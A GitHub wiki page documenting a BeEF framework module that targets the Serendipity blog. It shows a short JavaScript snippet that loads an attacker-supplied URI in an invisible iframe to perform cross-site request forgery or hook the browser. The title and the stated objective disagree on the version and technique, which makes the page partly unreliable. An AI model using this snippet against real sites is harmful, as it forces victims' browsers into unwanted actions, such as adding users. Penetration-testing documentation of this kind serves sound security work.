-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Serendipity = 1.1.1 Add User CSRF
Haoxi Tan edited this page Jan 9, 2020
·
2 revisions
-
Objective: hook Serendipity <= 1.6 using XSS
-
Authors: bcoles, Stefan Schurtz
-
Browsers: All
Uses an invisible iframe to hook the serendipity instance
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
var serendipity_iframe = beef.dom.createInvisibleIframe();
serendipity_iframe.setAttribute('src', uri);
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK